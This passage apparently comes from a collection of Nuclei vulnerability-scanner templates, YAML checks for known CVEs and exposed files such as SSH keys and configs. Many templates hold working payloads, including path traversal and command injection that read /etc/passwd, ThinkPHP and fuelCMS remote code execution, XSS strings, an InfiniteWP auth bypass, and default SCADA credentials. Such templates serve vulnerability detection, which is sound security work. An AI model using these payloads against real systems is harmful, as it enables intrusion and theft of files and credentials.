 6 |   reference: https://datacadamia.com/ssh/known_hosts
 7 |   severity: low
 8 |   tags: config,exposure,ssh
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.ssh/known_hosts"
14 |       - "{{BaseURL}}/.ssh/known_hosts.old"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "ssh-dss"
21 |           - "ssh-ed25519"
22 |           - "ssh-rsa"
23 |           - "ecdsa-sha2-nistp256"
24 |         condition: or
25 | 
26 |       - type: status
27 |         status:
28 |           - 200
29 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-12314.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-12314
 2 | info:
 3 |   name: Deltek Maconomy Path Traversal
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}/etc/passwd
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/12314
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-5410.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-5410
 2 | info:
 3 |   name: Spring Cloud Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 |  
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
19 | 
20 | references:
21 |   - https://www.cvebase.com/cve/2020/5410
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/eyelock-nano-lfd.yaml:
--------------------------------------------------------------------------------
 1 | id: eyelock-nano-lfd
 2 | 
 3 | info:
 4 |   name: EyeLock nano NXT 3.5 - Local File Disclosure
 5 |   description:
 6 |   author: geeknik
 7 |   reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
 8 |   severity: high
 9 |   tags: eyelock,lfd,traversal,iot,biometrics
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: status
19 |         status:
20 |           - 200
21 |       - type: regex
22 |         regex:
23 |           - "root:[x*]:0:0:"
24 |         part: body
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/go-pprof-exposed.yaml:
--------------------------------------------------------------------------------
 1 | id: go-pprof-exposed
 2 | info:
 3 |   name: go pprof exposed
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | variables:
10 |   - end: |
11 |       /
12 |       /debug/pprof/heap?debug=1
13 |       /_debug/pprof/heap?debug=1
14 | requests:
15 |   - method: GET
16 |     url: >-
17 |       {{.root}}{{.end}}
18 |     headers:
19 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 |     detections:
21 |       - >-
22 |         StatusCode() == 200 && StringSearch("response", "cmdline")   && StringSearch("response", "goroutine")
23 | 
24 | references:
25 |   - repo: https://github.com/google/pprof
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/java-melody-stat.yaml:
--------------------------------------------------------------------------------
 1 | id: java-melody-stat
 2 | info:
 3 |   name: JavaMelody Monitoring Exoised
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | 
10 | 
11 | variables:
12 |   - stats: |
13 |       /..%3B/monitoring
14 |       /monitoring
15 | 
16 | requests:
17 |   - method: GET
18 |     redirect: false
19 |     headers:
20 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
21 |     url: >-
22 |       {{.root}}{{.stats}}
23 |     detections:
24 |       - >-
25 |         StatusCode() == 200 && StringSearch("body", "JavaMelody") && StringSearch("body", "?period=mois")
26 |       


--------------------------------------------------------------------------------
/nuclei_pocs/pagespeed-global-admin.yaml:
--------------------------------------------------------------------------------
 1 | id: pagespeed-global-admin
 2 | 
 3 | info:
 4 |   name: Pagespeed Global Admin
 5 |   author: geeknik
 6 |   severity: low
 7 |   tags: pagespeed,admin
 8 | 
 9 | requests:
10 |   - method: GET
11 |     headers:
12 |       X-Client-IP: "127.0.0.1"
13 |       X-Remote-IP: "127.0.0.1"
14 |       X-Remote-Addr: "127.0.0.1"
15 |       X-Forwarded-For: "127.0.0.1"
16 |       X-Originating-IP: "127.0.0.1"
17 |       X-Host: "127.0.0.1"
18 |       X-Forwarded-Host: "127.0.0.1"
19 | 
20 |     path:
21 |       - "{{BaseURL}}/pagespeed-global-admin/"
22 | 
23 |     matchers:
24 |       - type: word
25 |         words:
26 |           - "X-Mod-Pagespeed"
27 |         part: header
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-17382.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-17382
 2 | info:
 3 |   name: Zabbix Improper Authentication
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       zabbix.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?action=dashboard.view&dashboardid=1
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "<title>Dashboard</title>") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/17382
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-8982.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-8982
 2 | info:
 3 |   name: Wavemaker Studio LFI
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       wavemaker/studioService.download
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}method=getContent&inUrl=file///etc/passwd
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/8982
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/kentico-open-redirect.yaml:
--------------------------------------------------------------------------------
 1 | id: kentico-open-redirect
 2 | info:
 3 |   name: Kentico Open Redirect
 4 |   risk: Low
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 |   - dest: "bing.com"
 9 | 
10 | replicate:
11 |   prefixes: 'kentico'
12 | 
13 | requests:
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}CMSPages/GetDocLink.ashx?link=https://{{.dest}}
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 |     detections:
20 |       - >-
21 |         (StatusCode() >= 300 && StatusCode() < 400) && (StringSearch("resHeaders", "Location: http://{{.dest}}") || StringSearch("resHeaders", "Location: https://{{.dest}}")
22 | 
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/salesforce-login.yaml:
--------------------------------------------------------------------------------
 1 | id: salesforce-login
 2 | 
 3 | info:
 4 |   name: Salesforce Credentials
 5 |   author: geeknik
 6 |   severity: high
 7 |   tags: salesforce,auth
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/js/salesforce.js"
13 |       - "{{BaseURL}}/salesforce.js"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "text/plain"
21 |       - type: status
22 |         status:
23 |           - 200
24 |       - type: word
25 |         words:
26 |           - "jsforce.Connection"
27 |           - "conn.login"
28 |           - "conn.query"
29 |         condition: and
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/swagger-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: swagger-xss
 2 | 
 3 | info:
 4 |   name: Swagger API XSS
 5 |   author: geeknik
 6 |   severity: medium
 7 |   reference: https://twitter.com/A0x017/status/1371122293921964032
 8 |   tags: swagger,xss
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/dochelper?userId=<script>alert({{randstr}})</script>"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "text/html"
21 |       - type: word
22 |         part: body
23 |         words:
24 |           - "<script>alert({{randstr}})</script>"
25 |       - type: status
26 |         status:
27 |           - 200
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/ventrilo-config.yaml:
--------------------------------------------------------------------------------
 1 | id: ventrilo-config
 2 | 
 3 | info:
 4 |   name: Ventrilo Configuration File
 5 |   author: geeknik
 6 |   reference: https://www.ventrilo.com/setup.php
 7 |   severity: high
 8 |   tags: ventrilo,config,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/ventrilo_srv.ini"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "text/plain"
21 |       - type: word
22 |         words:
23 |           - "[Server]"
24 |           - "Name"
25 |           - "Phonetic"
26 |         condition: and
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-20824.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-20824
 2 | info:
 3 |   name: Atlassian Jira XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |      {{.root}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch('response', 'alert(document.domain)') && StringSearch('response', 'AJS.WALLBOARD.')
19 | 
20 | references:
21 |   - https://www.cvebase.com/cve/2018/20824
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-9126.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-9126
 2 | info:
 3 |   name: DotNetNuke DNNarticle Module 11 - Directory Traversal (CVE-2018-9126)
 4 |   risk: Potential
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config&smid=512&portalid=3
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
15 |     detections:
16 |       - >-
17 |         StatusCode() == 200 && StringSearch("body", "<configuration>") && StringSearch("body", "SiteSqlServer")
18 | references:
19 |   - links:
20 |       - https://www.exploit-db.com/exploits/44414


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-8449.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-8449
 2 | info:
 3 |   name: Jira Information Leak
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       rest/api/latest/groupuserpicker
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?query=1&maxResults=50000&showAvatar=true
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", '{"users":{"users":')
21 | references:
22 |   - https://www.cvebase.com/cve/2019/8449
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-11710.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-11710
 2 | info:
 3 |   name: Kong API Improper Authorization
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       status
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && (StringSearch("resBody", "kong_env") || StringSearch("resBody", "kong_db_cache_miss"))
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/11710
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-3167.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2018-3167
 2 | 
 3 | info:
 4 |   name: Unauthenticated Blind SSRF in Oracle EBS
 5 |   author: geeknik
 6 |   severity: low
 7 |   description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
 8 |   tags: cve,cve2018,oracle,ebs,ssrf
 9 | 
10 | requests:
11 |   - method: POST
12 |     path:
13 |       - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
14 | 
15 |     body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80">
16 | 
17 |     matchers-condition: and
18 |     matchers:
19 |       - type: word
20 |         words:
21 |           - 'Unexpected text in DTD'
22 |         part: body
23 |       - type: status
24 |         status:
25 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-15920.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-15920
 2 | info:
 3 |   name: Mida eFramework RCE
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       PDC/ajaxreq.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/15920
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-8772.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-8772
 2 | info:
 3 |   name: InfiniteWP Improper Authentication
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 | requests: 
11 |   - method: POST
12 |     url: >-
13 |       {{.root}}/wp-admin/
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     body: |
17 |       _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
18 |     detections:
19 |       - >-
20 |         StringSearch("resHeaders", "IWPHEADER")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/8772
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-3799.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-3799
 2 | info:
 3 |   name: Spring Cloud Config Server Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       test/pathtraversal/master/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}..%252f..%252f..%252f..%252f../etc/passwd   
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/3799
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-2140.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-2140
 2 | info:
 3 |   name: Jenkins Audit Trail XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | replicate:
10 |   prefixes: 'jenkins'
11 | 
12 | requests:
13 |   - method: GET
14 |     redirect: false
15 |     url: >-
16 |       {{.root}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("response", "<h1>sample") && StringSearch("response", "regular expression")
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/2140
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-8512.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-8512
 2 | info:
 3 |   name: IceWarp WebMail XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("body", "IceWarp WebClient") && StringSearch("body", "<svg/onload=alert(document.domain)>")
19 | 
20 | references:
21 |   - https://www.cvebase.com/cve/2020/8512
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/php-symfony-debug.yaml:
--------------------------------------------------------------------------------
 1 | id: php-symfony-debug
 2 | info:
 3 |   name: Symfony Debug bar
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/_profiler/empty/search/results?limit=10
14 |     detections:
15 |       - >-
16 |         StatusCode() == 200 && StringSearch("response", 'symfony/profiler') && StringSearch("response", "Symfony Profiler")
17 |   - method: GET
18 |     redirect: false
19 |     url: >-
20 |       {{.root}}/_profiler/phpinfo
21 |     detections:
22 |       - >-
23 |         StatusCode() == 200 && StringSearch("response", 'Configure Command') && StringSearch("body", "phpinfo()</title>")


--------------------------------------------------------------------------------
/nuclei_pocs/ssh-authorized-keys.yaml:
--------------------------------------------------------------------------------
 1 | id: ssh-authorized-keys
 2 | 
 3 | info:
 4 |   name: SSH Authorized Keys
 5 |   author: geeknik
 6 |   reference: https://www.ssh.com/academy/ssh/authorized-key
 7 |   severity: low
 8 |   tags: config,exposure,ssh
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.ssh/authorized_keys"
14 |       - "{{BaseURL}}/_/.ssh/authorized_keys"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "ssh-dss"
21 |           - "ssh-ed25519"
22 |           - "ssh-rsa"
23 |           - "ecdsa-sha2-nistp256"
24 |         condition: or
25 | 
26 |       - type: status
27 |         status:
28 |           - 200
29 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-6360.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2017-6360
 2 | info:
 3 |   name: QNAP QTS RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       cgi-bin/userConfig.cgi
12 | requests:
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;cat%20/etc/passwd)>%262`
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2017/6360
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/docker-registry.yaml:
--------------------------------------------------------------------------------
 1 | # info to search signature
 2 | id: docker-registry
 3 | info:
 4 |   name: Docker Registry Exposed
 5 |   risk: High
 6 | 
 7 | requests:
 8 |   - method: GET
 9 |     redirect: false
10 |     url: >-
11 |      {{.BaseURL}}/v2/
12 |     detections:
13 |       - >-
14 |         StatusCode() == 200 && StringSearch("response", "registry/2.0") && StringSearch("response", "docker-distribution-api-version")
15 |   
16 |   - method: GET
17 |     redirect: false
18 |     url: >-
19 |      {{.BaseURL}}/v2/_catalog
20 |     detections:
21 |       - >-
22 |         StatusCode() == 200 && StringSearch("response", "repositories")
23 | 
24 | reference:
25 |   - link: http://www.polaris-lab.com/index.php/archives/253/


--------------------------------------------------------------------------------
/nuclei_pocs/ganglia-xml-grid-monitor.yaml:
--------------------------------------------------------------------------------
 1 | id: ganglia-xml-grid-monitor
 2 | 
 3 | info:
 4 |   name: Ganglia XML Grid Monitor
 5 |   author: geeknik
 6 |   description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids.
 7 |   reference: http://ganglia.info/
 8 |   severity: low
 9 |   tags: ganglia,network
10 | 
11 | network:
12 |   - inputs:
13 |       - data: "\r\n"
14 | 
15 |     host:
16 |       - "{{Hostname}}"
17 |       - "{{Hostname}}:8649"
18 |     read-size: 2048
19 | 
20 |     matchers:
21 |       - type: word
22 |         words:
23 |           - "<!DOCTYPE GANGLIA_XML"
24 |           - "<!ATTLIST"
25 |           - "<!ELEMENT"
26 |         condition: and
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-20062.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-20062
 2 | info:
 3 |   name: ThinkPHP RCE
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       index.php/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "PHP Version") 
21 | references:
22 |   - https://www.cvebase.com/cve/2018/20062
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-9082.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-9082
 2 | info:
 3 |   name: ThinkPHP RCE
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       index.php
12 | requests: 
13 |   - method: POST
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?s=captcha 
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     body: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
19 |     detections:
20 |       - >-
21 |         StatusCode() == 206 && StringSearch("resBody", "uid")
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2019/9082
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-9978.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-9978
 2 | info:
 3 |   name: Wordpress RFI
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       wp-admin/admin-post.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?swp_debug=load_options&swp_url=http://burpcollaborator.net
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "Burp Collaborator Server")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2019/9978
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/circarlife-default-login.yaml:
--------------------------------------------------------------------------------
 1 | id: circarlife-default-login
 2 | 
 3 | info:
 4 |   name: CirCarLife SCADA Default Login
 5 |   reference: https://www.exploit-db.com/exploits/45384
 6 |   author: geeknik
 7 |   severity: critical
 8 |   tags: circarlife,scada,iot,auth
 9 | 
10 | requests:
11 |   - method: POST
12 |     path:
13 |       - "{{BaseURL}}/html/setup.html"
14 |     headers:
15 |       Authorization: "Basic YWRtaW46MTIzNAo="
16 | 
17 |     matchers-condition: and
18 |     matchers:
19 |       - type: status
20 |         status:
21 |           - 200
22 |       - type: word
23 |         words:
24 |           - "<title>OCPP Engine - Setup</title>"
25 |           - "Application Parameters"
26 |         condition: and
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/exposed-bzr.yaml:
--------------------------------------------------------------------------------
 1 | id: exposed-bzr
 2 | 
 3 | info:
 4 |   name: Exposed BZR Directory
 5 |   author: daffainfo
 6 |   severity: low
 7 |   reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
 8 |   tags: config,exposure
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.bzr/branch/branch.conf"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "parent_location"
20 |           - "push_location"
21 |         condition: or
22 | 
23 |       - type: status
24 |         status:
25 |           - 200
26 | 
27 |       - type: word
28 |         part: header
29 |         words:
30 |           - "text/plain"


--------------------------------------------------------------------------------
/nuclei_pocs/tectuus-scada-monitor.yaml:
--------------------------------------------------------------------------------
 1 | id: tectuus-scada-monitor
 2 | 
 3 | info:
 4 |   name: Tectuus SCADA Monitor
 5 |   reference: https://www.tectuus.mx/
 6 |   author: geeknik
 7 |   severity: info
 8 |   tags: panel,tectuus,scada
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}"
14 | 
15 |     redirects: true
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: status
19 |         status:
20 |           - 200
21 |       - type: word
22 |         words:
23 |           - "<title>SCADmonitor</title>"
24 |           - "<title>SCADAmonitor</title>"
25 |         condition: or
26 |       - type: word
27 |         words:
28 |           - "SCADAmonitor y su logo son propiedad de tectuus®"
29 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-16763.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-16763
 2 | info:
 3 |   name: fuelCMS RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       fuel/pages/select/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2018/16763
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-0230.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2019-0230
 2 | 
 3 | info:
 4 |   name: Apache Struts RCE
 5 |   author: geeknik
